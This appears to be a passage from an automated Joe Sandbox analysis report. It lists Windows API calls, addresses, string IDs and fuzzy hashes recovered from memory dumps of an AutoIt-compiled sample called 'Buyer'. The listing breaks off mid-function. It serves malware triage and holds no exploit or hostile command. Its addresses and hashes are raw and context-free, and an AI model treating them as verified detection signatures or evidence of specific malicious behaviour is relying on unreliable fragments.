                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfo$Show$DefaultDrawFocusMove
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 1429628313-4108050209
                                                                                                    • Opcode ID: ea38a4673a18f3c633fca318c943307d49d734e4d93be7940548cbb7953d58ce
                                                                                                    • Instruction ID: 5d5b89c9db986036829208a4ba295cfe5d9972ac452b3de024174afe9e1d9871
                                                                                                    • Opcode Fuzzy Hash: ea38a4673a18f3c633fca318c943307d49d734e4d93be7940548cbb7953d58ce
                                                                                                    • Instruction Fuzzy Hash: 12020F71508341AFD715DF24C849BABBBE6FF89324F088A1EF4948A3A1D334D945EB91
                                                                                                    APIs
                                                                                                    • GetSysColor.USER32(00000012), ref: 00FD7AEC
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FD7AF0
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FD7B06
                                                                                                    • GetSysColor.USER32(0000000F), ref: 00FD7B11
                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00FD7B16
                                                                                                    • GetSysColor.USER32(00000011), ref: 00FD7B2E
                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FD7B3C
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00FD7B4D
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00FD7B56
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7B63
                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00FD7B82
                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FD7B99
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00FD7BA6
                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FD7BF5
                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FD7C1F
                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00FD7C3D
                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00FD7C48
                                                                                                    • GetSysColor.USER32(00000011), ref: 00FD7C59
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00FD7C61
                                                                                                    • DrawTextW.USER32(?,00FD77C0,000000FF,?,00000000), ref: 00FD7C73
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7C8A
                                                                                                    • DeleteObject.GDI32(?), ref: 00FD7C95
                                                                                                    • SelectObject.GDI32(?,?), ref: 00FD7C9B
                                                                                                    • DeleteObject.GDI32(?), ref: 00FD7CA0
                                                                                                    • SetTextColor.GDI32(?,?), ref: 00FD7CA6
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00FD7CB0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1996641542-0
                                                                                                    • Opcode ID: edf416e9f8a8e4e105dd6ca4f28f0f3dc2d47c21257b578ec7d1a18563fdc181
                                                                                                    • Instruction ID: 44d8381fa1572588987c47b5951d52e8d02217af159a491a922d5d5417f9000b
                                                                                                    • Opcode Fuzzy Hash: edf416e9f8a8e4e105dd6ca4f28f0f3dc2d47c21257b578ec7d1a18563fdc181
                                                                                                    • Instruction Fuzzy Hash: 39614F72D05218AFDB01AFA4DC49EEEBF7AEF08320F154116F915AB2A0D7759940EB90
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00FD18E2
                                                                                                    • GetDesktopWindow.USER32 ref: 00FD18F7
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00FD18FE
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00FD1953
                                                                                                    • DestroyWindow.USER32(?), ref: 00FD1973
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FD19A7
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FD19C5
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FD19D7
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FD19EC
                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FD19FF
                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00FD1A5B
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FD1A76
                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FD1A8A
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00FD1AA2
                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00FD1AC8
                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00FD1AE2
                                                                                                    • CopyRect.USER32(?,?), ref: 00FD1AF9
                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FD1B64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                    • API String ID: 698492251-4156429822
                                                                                                    • Opcode ID: 7f284b6e1a6f808faff6351d1201a00a103e2403f9522293ef027569f4cf7f4f
                                                                                                    • Instruction ID: d201e626d7292daef245d09f1245c31362a7c5a03a343a55c0d0b3afb5a8fba9
                                                                                                    • Opcode Fuzzy Hash: 7f284b6e1a6f808faff6351d1201a00a103e2403f9522293ef027569f4cf7f4f
                                                                                                    • Instruction Fuzzy Hash: 8AB19B71A04300AFD714DF64C884B6BBBE6FF84314F04891EF9999B2A1D731E845EB92
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FD0A9F
                                                                                                    • _wcslen.LIBCMT ref: 00FD0AD9
                                                                                                    • _wcslen.LIBCMT ref: 00FD0B43
                                                                                                    • _wcslen.LIBCMT ref: 00FD0BAB
                                                                                                    • _wcslen.LIBCMT ref: 00FD0C2F
                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FD0C7F
                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD0CBE
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                      • Part of subcall function 00FA2921: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FA293A
                                                                                                      • Part of subcall function 00FA2921: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FA296C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                    • API String ID: 1103490817-719923060
                                                                                                    • Opcode ID: 94b71758fefa450611a20d727aa3d2bbbbc6ad3d8958bb451e9605a344958753
                                                                                                    • Instruction ID: f13c774ff3018bfaac63807ab81de0865646950788b4096b535c8c5b25d0c892
                                                                                                    • Opcode Fuzzy Hash: 94b71758fefa450611a20d727aa3d2bbbbc6ad3d8958bb451e9605a344958753
                                                                                                    • Instruction Fuzzy Hash: 92E191326187018FC714EF24C951A2AB7E6FF84314F18895EF8969B392DB34ED45EB81
                                                                                                    APIs
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F4152D
                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00F41535
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F41560
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00F41568
                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00F4158D
                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F415AA
                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F415BA
                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F415ED
                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F41601
                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00F4161F
                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F4163B
                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F41646
                                                                                                      • Part of subcall function 00F4135A: GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                      • Part of subcall function 00F4135A: ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                      • Part of subcall function 00F4135A: GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00F59421), ref: 00F4166D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                    • API String ID: 1458621304-248962490
                                                                                                    • Opcode ID: bc5e2d593c7c2503d14a4929d5a88010e827e1e263ca89d1d87f5ecbcc434f2e
                                                                                                    • Instruction ID: cb3748b0319735bad41513e00a69d5763c04db20a9348f29aa9ffd1558910158
                                                                                                    • Opcode Fuzzy Hash: bc5e2d593c7c2503d14a4929d5a88010e827e1e263ca89d1d87f5ecbcc434f2e
                                                                                                    • Instruction Fuzzy Hash: 21B17A31A012099FDB14EFA8CD45BEE3BB5FB48324F10421AFA15A7294DB78E841EB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                      • Part of subcall function 00FA17DB: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                      • Part of subcall function 00FA17DB: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                      • Part of subcall function 00FA17DB: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                      • Part of subcall function 00FA17DB: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA14D7
                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA150B
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA1522
                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FA155C
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA1578
                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FA158F
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA1597
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FA159E
                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA15BF
                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FA15C6
                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA15F5
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA1617
                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA1629
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1650
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1657
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1660
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1667
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA1670
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA1677
                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FA1683
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00FA168A
                                                                                                      • Part of subcall function 00FA1875: GetProcessHeap.KERNEL32(00000008,00FA1293,?,00000000,?,00FA1293,?), ref: 00FA1883
                                                                                                      • Part of subcall function 00FA1875: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA1293,?), ref: 00FA188A
                                                                                                      • Part of subcall function 00FA1875: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA1293,?), ref: 00FA1899
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 4175595110-0
                                                                                                    • Opcode ID: 2f45a4ea11bfd103f6b3f3635b9563f0afa00d4aa4149f9209c6ec741a55f756
                                                                                                    • Instruction ID: 3ed29a896ec3fdbcb6d96608a9e9f0693e366d5fad16e218b939bd6c54196cc9
                                                                                                    • Opcode Fuzzy Hash: 2f45a4ea11bfd103f6b3f3635b9563f0afa00d4aa4149f9209c6ec741a55f756
                                                                                                    • Instruction Fuzzy Hash: CB7148B6D00209BFDB109FA4DC48BEEBBB9BF45360F094116F915E7291D7319A05EBA0
                                                                                                    APIs
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCCC44
                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FDDC1C,00000000,?,00000000,?,?), ref: 00FCCCCB
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FCCD2B
                                                                                                    • _wcslen.LIBCMT ref: 00FCCD7B
                                                                                                    • _wcslen.LIBCMT ref: 00FCCDF6
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FCCE39
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FCCF48
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00FCCFD4
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FCD008
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCD015
                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FCD0E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                    • API String ID: 9721498-966354055
                                                                                                    • Opcode ID: 8956017b4f886749a4de79b7a1d569557165284386d0b06ad92e64203992fd6a
                                                                                                    • Instruction ID: 19b2e9ce1542fae75b2d352f3e4c05c21c5e56703eb30b7fcbfef976ddaad1ce
                                                                                                    • Opcode Fuzzy Hash: 8956017b4f886749a4de79b7a1d569557165284386d0b06ad92e64203992fd6a
                                                                                                    • Instruction Fuzzy Hash: 9D123C356046019FD714EF14C981F2ABBE6EF88724F04849DF85A9B3A2CB35ED42DB91
                                                                                                    APIs
                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FD1180
                                                                                                    • _wcslen.LIBCMT ref: 00FD11BB
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FD120E
                                                                                                    • _wcslen.LIBCMT ref: 00FD1244
                                                                                                    • _wcslen.LIBCMT ref: 00FD12C0
                                                                                                    • _wcslen.LIBCMT ref: 00FD133B
                                                                                                      • Part of subcall function 00F5FD18: _wcslen.LIBCMT ref: 00F5FD23
                                                                                                      • Part of subcall function 00FA32CA: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FA32DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                    • Opcode ID: a5e79e6abc23efdcb61ab17cfb6cfbdbe74e1d449a16e09d04d16b808905f327
                                                                                                    • Instruction ID: e2254cf631661660840fd9ffe3e7813cfadba47330ed17db1a72150e6e794e5e
                                                                                                    • Opcode Fuzzy Hash: a5e79e6abc23efdcb61ab17cfb6cfbdbe74e1d449a16e09d04d16b808905f327
                                                                                                    • Instruction Fuzzy Hash: 49E1C2726087019FC714EF24C84092AB7F2BF95314F18895EF8969B7A2D734ED46EB81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                    • API String ID: 1256254125-909552448
                                                                                                    • Opcode ID: fddc758ce3c33f709a5a1ba3406da35f080be37c99821bb6012b0b27a1acf56d
                                                                                                    • Instruction ID: 94204eb926a4e631df9699313b03339ffa54e29d6c4f745f6c741ff0b62bbb5f
                                                                                                    • Opcode Fuzzy Hash: fddc758ce3c33f709a5a1ba3406da35f080be37c99821bb6012b0b27a1acf56d
                                                                                                    • Instruction Fuzzy Hash: 8971E132E005678BDB10AE68CF42FFE3391AF60360F25053DEC559B284EA35DD45E6A1
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A46
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A5A
                                                                                                    • _wcslen.LIBCMT ref: 00FD8A7D
                                                                                                    • _wcslen.LIBCMT ref: 00FD8AA0
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FD8ADE
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FD63B2), ref: 00FD8B3A
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD8B73
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FD8BB6
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FD8BED
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FD8BF9
                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FD8C09
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00FD63B2), ref: 00FD8C18
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FD8C35
                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FD8C41
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                    • API String ID: 799131459-1154884017
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00FB4667
                                                                                                    • _wcslen.LIBCMT ref: 00FB4672
                                                                                                    • _wcslen.LIBCMT ref: 00FB46C9
                                                                                                    • _wcslen.LIBCMT ref: 00FB4707
                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00FB4745
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB478D
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB47C8
                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FB47F6
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 00FA6127
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FA6139
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00FA6150
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00FA6165
